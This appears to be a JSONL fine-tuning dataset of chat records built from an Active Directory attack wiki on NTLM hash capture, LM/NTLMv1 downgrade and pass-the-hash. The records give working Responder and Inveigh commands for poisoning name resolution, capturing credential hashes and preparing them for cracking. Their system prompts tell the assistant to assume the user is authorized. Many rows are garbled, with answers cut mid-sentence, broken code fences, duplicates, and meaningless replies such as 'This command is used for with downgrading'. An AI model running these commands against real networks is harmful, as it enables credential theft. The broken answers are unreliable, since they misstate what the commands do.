testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Capture - Theory?"}, {"role": "assistant", "content": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the hash (LM or NTLM hash, a.k.a. response) sent by the victim."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Capture - Theory?", "response": "After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the hash (LM or NTLM hash, a.k.a. response) sent by the victim.", "metadata": {"corpus_index": 936, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Capture - Practice?"}, {"role": "assistant", "content": "> [!TIP]\n> NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different \"authentication forcing\" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).\n\nResponder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.\n\n> [!TIP]\n> In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788.\n> \n> For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.\n> \n> ``bash\n> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> `\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with --lm and --disable-ess in order to obtain NTLMv1 responses.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Capture - Practice?", "response": "> [!TIP]\n> NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different \"authentication forcing\" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).\n\nResponder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.\n\n> [!TIP]\n> In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788.\n> \n> For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.\n> \n> ``bash\n> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> `\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with --lm and --disable-ess in order to obtain NTLMv1 responses.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A", "metadata": {"corpus_index": 937, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Capture - Practice?"}, {"role": "assistant", "content": "> [!TIP]\n> NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different \"authentication forcing\" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).\n\nResponder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.\n\n> [!TIP]\n> In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788.\n> \n> For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.\n> \n> ``bash\n> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> `\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with --lm and --disable-ess in order to obtain NTLMv1 responses.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Capture - Practice?", "response": "> [!TIP]\n> NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different \"authentication forcing\" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).\n\nResponder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.\n\n> [!TIP]\n> In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788.\n> \n> For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.\n> \n> ``bash\n> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> `\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, Responder (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with --lm and --disable-ess in order to obtain NTLMv1 responses.\n\n``bash\nresponder --interface \"eth0\" --analyze\nresponder -I \"eth0\" -A", "metadata": {"corpus_index": 937, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the sed command to capture - practice"}, {"role": "assistant", "content": "> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> ```\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, [Responder](https://github.com/lgandx/Responder) (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with `--lm` and `--disable-ess` in order to obtain NTLMv1 responses."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the sed command to capture - practice", "response": "> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> ```\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, [Responder](https://github.com/lgandx/Responder) (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with `--lm` and `--disable-ess` in order to obtain NTLMv1 responses.", "metadata": {"corpus_index": 938, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sed"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Capture - Practice"}, {"role": "assistant", "content": "> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> ```\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, [Responder](https://github.com/lgandx/Responder) (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with `--lm` and `--disable-ess` in order to obtain NTLMv1 responses."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Capture - Practice", "response": "> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf\n> ```\n\n::: tabs\n\n=== Responder\n\nFrom UNIX-like systems, [Responder](https://github.com/lgandx/Responder) (Python) can be used to start servers listening for NTLM authentications over many protocols (SMB, HTTP, LDAP, FTP, POP3, IMAP, SMTP, ...). Depending on the authenticating principal's configuration, the NTLM authentication can sometimes be downgraded with `--lm` and `--disable-ess` in order to obtain NTLMv1 responses.", "metadata": {"corpus_index": 938, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf`?"}, {"role": "assistant", "content": "This command is used for capture - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf`?", "response": "This command is used for capture - practice. Practice", "metadata": {"corpus_index": 938, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does with downgrading work?"}, {"role": "assistant", "content": "responder --interface \"eth0\" --analyze --lm --disable-ess\n``\n\nTesters should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh. The ntlmv1-multi tool (Python) can be used to convert captured responses to crackable formats by hashcat, crack.sh and so on.\n\n`bash\nntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788\n`\n\n> [!SUCCESS]\n> Machine account NT hashes can be used with the Silver Ticket or S4U2self abuse techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures\n\n`powershell\n.\\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does with downgrading work?", "response": "responder --interface \"eth0\" --analyze --lm --disable-ess\n``\n\nTesters should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh. The ntlmv1-multi tool (Python) can be used to convert captured responses to crackable formats by hashcat, crack.sh and so on.\n\n`bash\nntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788\n`\n\n> [!SUCCESS]\n> Machine account NT hashes can be used with the Silver Ticket or S4U2self abuse techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures\n\n`powershell\n.\\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y\n``\n\n:::", "metadata": {"corpus_index": 939, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out with downgrading during a pentest?"}, {"role": "assistant", "content": "responder --interface \"eth0\" --analyze --lm --disable-ess\n``\n\nTesters should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh. The ntlmv1-multi tool (Python) can be used to convert captured responses to crackable formats by hashcat, crack.sh and so on.\n\n`bash\nntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788\n`\n\n> [!SUCCESS]\n> Machine account NT hashes can be used with the Silver Ticket or S4U2self abuse techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures\n\n`powershell\n.\\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out with downgrading during a pentest?", "response": "responder --interface \"eth0\" --analyze --lm --disable-ess\n``\n\nTesters should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh. The ntlmv1-multi tool (Python) can be used to convert captured responses to crackable formats by hashcat, crack.sh and so on.\n\n`bash\nntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788\n`\n\n> [!SUCCESS]\n> Machine account NT hashes can be used with the Silver Ticket or S4U2self abuse techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures\n\n`powershell\n.\\Inveigh.exe -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y\n``\n\n:::", "metadata": {"corpus_index": 939, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Testers for with downgrading?"}, {"role": "assistant", "content": "Testers should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with [crack.sh](https://crack.sh/netntlm/). The [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool (Python) can be used to convert captured responses to crackable formats by hashcat, [crack.sh](https://crack.sh/netntlm/) and so on."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Testers for with downgrading?", "response": "Testers should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with [crack.sh](https://crack.sh/netntlm/). The [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool (Python) can be used to convert captured responses to crackable formats by hashcat, [crack.sh](https://crack.sh/netntlm/) and so on.", "metadata": {"corpus_index": 940, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Testers"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for with downgrading?"}, {"role": "assistant", "content": "Testers should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with [crack.sh](https://crack.sh/netntlm/). The [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool (Python) can be used to convert captured responses to crackable formats by hashcat, [crack.sh](https://crack.sh/netntlm/) and so on."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for with downgrading?", "response": "Testers should try to force a LM hashing downgrade with Responder. LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with [crack.sh](https://crack.sh/netntlm/). The [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool (Python) can be used to convert captured responses to crackable formats by hashcat, [crack.sh](https://crack.sh/netntlm/) and so on.", "metadata": {"corpus_index": 940, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with downgrading"}, {"role": "assistant", "content": "> [!SUCCESS]\n> Machine account NT hashes can be used with the [Silver Ticket](../kerberos/forged-tickets/silver.md) or [S4U2self abuse](../kerberos/delegations/s4u2self-abuse.md) techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with downgrading", "response": "> [!SUCCESS]\n> Machine account NT hashes can be used with the [Silver Ticket](../kerberos/forged-tickets/silver.md) or [S4U2self abuse](../kerberos/delegations/s4u2self-abuse.md) techniques to gain admin access to it.\n\n> [!TIP]\n> There are cases where a downgrade attempt will fail and the capture authentication will not be shown. Testers should always try to capture authentication with and without downgrading.\n\n\n=== Inveigh\n\nStart poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures", "metadata": {"corpus_index": 941, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!SUCCESS]`?"}, {"role": "assistant", "content": "This command is used for with downgrading. with downgrading"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!SUCCESS]`?", "response": "This command is used for with downgrading. with downgrading", "metadata": {"corpus_index": 941, "category": "network", "source_file": "docs/src/ad/movement/ntlm/capture.md", "page_title": "Capture", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about NTLM - Theory"}, {"role": "assistant", "content": "> [!WARNING]\n> A common error people do is mix LM, NT, NTLM, Net-NTLM etc. Let's make things clear. There are hashing formats used to store user passwords: LM, NT. And there are authentication protocols used to authenticate users to remote resources: LM, NTLMv1, and NTLMv2 (\nsource).\n> \n> * LM hash and NT hash will refer to the hashing formats\n> * LM, NTLM(v1), and NTLMv2, will refer to the authentication protocols\n> * LMv1 and LMv2 are response formats that clients return when responding to NTLM_CHALLENGE NTLMv1 and NTLMv2 messages, respectively.\n> \n> Yes.. this is confusing, but hey go tell this to Microsoft :triumph:\n\nThe LM (LAN Manager) and NTLM (New Technology LM) authentication protocols are widely used in today's Microsoft environments (but mostly NTLM). It relies on a challenge-response scheme based on three messages to authenticate. In order to prove its identity, the authenticating client is asked to compute a response based on multiple variables including:\n\n* a random challenge sent by the server in a CHALLENGE_MESSAGE\n* a secret key that is the hash of the user's password\n\nThe following table details the secret key used by each authentication protocols and the cryptographic algorithm used to compute the response (source).\n\n| Authentication protocol | Algorithm (for the protocol) | Secret key |\n| ----------------------- | ---------------------------- | ---------- |\n| LM | DES-ECB | LM hash |\n| NTLM | DES-ECB | NT hash |\n| NTLMv2 | HMAC-MD5 | NT hash |\n\nThe following table details the hashing algorithm used by each hashing format in Windows that allows the system to transform the user's password in a non-reversible format.\n\n| Hashing format | Algorithm (for the hash) |\n| -------------- | ------------------------------------------------------------------------------------- |\n| LM hash | based on DES (learn more) |\n| NT hash | MD4 |\n\nThis is meant to protect the user's password from eavesdropping by implementing the \"zero-knowledge proof\" concept. Attackers"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about NTLM - Theory", "response": "> [!WARNING]\n> A common error people do is mix LM, NT, NTLM, Net-NTLM etc. Let's make things clear. There are hashing formats used to store user passwords: LM, NT. And there are authentication protocols used to authenticate users to remote resources: LM, NTLMv1, and NTLMv2 (\nsource).\n> \n> * LM hash and NT hash will refer to the hashing formats\n> * LM, NTLM(v1), and NTLMv2, will refer to the authentication protocols\n> * LMv1 and LMv2 are response formats that clients return when responding to NTLM_CHALLENGE NTLMv1 and NTLMv2 messages, respectively.\n> \n> Yes.. this is confusing, but hey go tell this to Microsoft :triumph:\n\nThe LM (LAN Manager) and NTLM (New Technology LM) authentication protocols are widely used in today's Microsoft environments (but mostly NTLM). It relies on a challenge-response scheme based on three messages to authenticate. In order to prove its identity, the authenticating client is asked to compute a response based on multiple variables including:\n\n* a random challenge sent by the server in a CHALLENGE_MESSAGE\n* a secret key that is the hash of the user's password\n\nThe following table details the secret key used by each authentication protocols and the cryptographic algorithm used to compute the response (source).\n\n| Authentication protocol | Algorithm (for the protocol) | Secret key |\n| ----------------------- | ---------------------------- | ---------- |\n| LM | DES-ECB | LM hash |\n| NTLM | DES-ECB | NT hash |\n| NTLMv2 | HMAC-MD5 | NT hash |\n\nThe following table details the hashing algorithm used by each hashing format in Windows that allows the system to transform the user's password in a non-reversible format.\n\n| Hashing format | Algorithm (for the hash) |\n| -------------- | ------------------------------------------------------------------------------------- |\n| LM hash | based on DES (learn more) |\n| NT hash | MD4 |\n\nThis is meant to protect the user's password from eavesdropping by implementing the \"zero-knowledge proof\" concept. Attackers", "metadata": {"corpus_index": 942, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/index.md", "page_title": "NTLM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTLM - Theory"}, {"role": "assistant", "content": "> [!WARNING]\n> A common error people do is mix LM, NT, NTLM, Net-NTLM etc. Let's make things clear. There are hashing formats used to store user passwords: LM, NT. And there are authentication protocols used to authenticate users to remote resources: LM, NTLMv1, and NTLMv2 (\nsource).\n> \n> * LM hash and NT hash will refer to the hashing formats\n> * LM, NTLM(v1), and NTLMv2, will refer to the authentication protocols\n> * LMv1 and LMv2 are response formats that clients return when responding to NTLM_CHALLENGE NTLMv1 and NTLMv2 messages, respectively.\n> \n> Yes.. this is confusing, but hey go tell this to Microsoft :triumph:\n\nThe LM (LAN Manager) and NTLM (New Technology LM) authentication protocols are widely used in today's Microsoft environments (but mostly NTLM). It relies on a challenge-response scheme based on three messages to authenticate. In order to prove its identity, the authenticating client is asked to compute a response based on multiple variables including:\n\n* a random challenge sent by the server in a CHALLENGE_MESSAGE\n* a secret key that is the hash of the user's password\n\nThe following table details the secret key used by each authentication protocols and the cryptographic algorithm used to compute the response (source).\n\n| Authentication protocol | Algorithm (for the protocol) | Secret key |\n| ----------------------- | ---------------------------- | ---------- |\n| LM | DES-ECB | LM hash |\n| NTLM | DES-ECB | NT hash |\n| NTLMv2 | HMAC-MD5 | NT hash |\n\nThe following table details the hashing algorithm used by each hashing format in Windows that allows the system to transform the user's password in a non-reversible format.\n\n| Hashing format | Algorithm (for the hash) |\n| -------------- | ------------------------------------------------------------------------------------- |\n| LM hash | based on DES (learn more) |\n| NT hash | MD4 |\n\nThis is meant to protect the user's password from eavesdropping by implementing the \"zero-knowledge proof\" concept. Attackers"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTLM - Theory", "response": "> [!WARNING]\n> A common error people do is mix LM, NT, NTLM, Net-NTLM etc. Let's make things clear. There are hashing formats used to store user passwords: LM, NT. And there are authentication protocols used to authenticate users to remote resources: LM, NTLMv1, and NTLMv2 (\nsource).\n> \n> * LM hash and NT hash will refer to the hashing formats\n> * LM, NTLM(v1), and NTLMv2, will refer to the authentication protocols\n> * LMv1 and LMv2 are response formats that clients return when responding to NTLM_CHALLENGE NTLMv1 and NTLMv2 messages, respectively.\n> \n> Yes.. this is confusing, but hey go tell this to Microsoft :triumph:\n\nThe LM (LAN Manager) and NTLM (New Technology LM) authentication protocols are widely used in today's Microsoft environments (but mostly NTLM). It relies on a challenge-response scheme based on three messages to authenticate. In order to prove its identity, the authenticating client is asked to compute a response based on multiple variables including:\n\n* a random challenge sent by the server in a CHALLENGE_MESSAGE\n* a secret key that is the hash of the user's password\n\nThe following table details the secret key used by each authentication protocols and the cryptographic algorithm used to compute the response (source).\n\n| Authentication protocol | Algorithm (for the protocol) | Secret key |\n| ----------------------- | ---------------------------- | ---------- |\n| LM | DES-ECB | LM hash |\n| NTLM | DES-ECB | NT hash |\n| NTLMv2 | HMAC-MD5 | NT hash |\n\nThe following table details the hashing algorithm used by each hashing format in Windows that allows the system to transform the user's password in a non-reversible format.\n\n| Hashing format | Algorithm (for the hash) |\n| -------------- | ------------------------------------------------------------------------------------- |\n| LM hash | based on DES (learn more) |\n| NT hash | MD4 |\n\nThis is meant to protect the user's password from eavesdropping by implementing the \"zero-knowledge proof\" concept. Attackers", "metadata": {"corpus_index": 942, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/index.md", "page_title": "NTLM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Pass the hash - Theory in the context of penetration testing"}, {"role": "assistant", "content": "An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with overpass-the-hash)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Pass the hash - Theory in the context of penetration testing", "response": "An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with overpass-the-hash).", "metadata": {"corpus_index": 943, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} 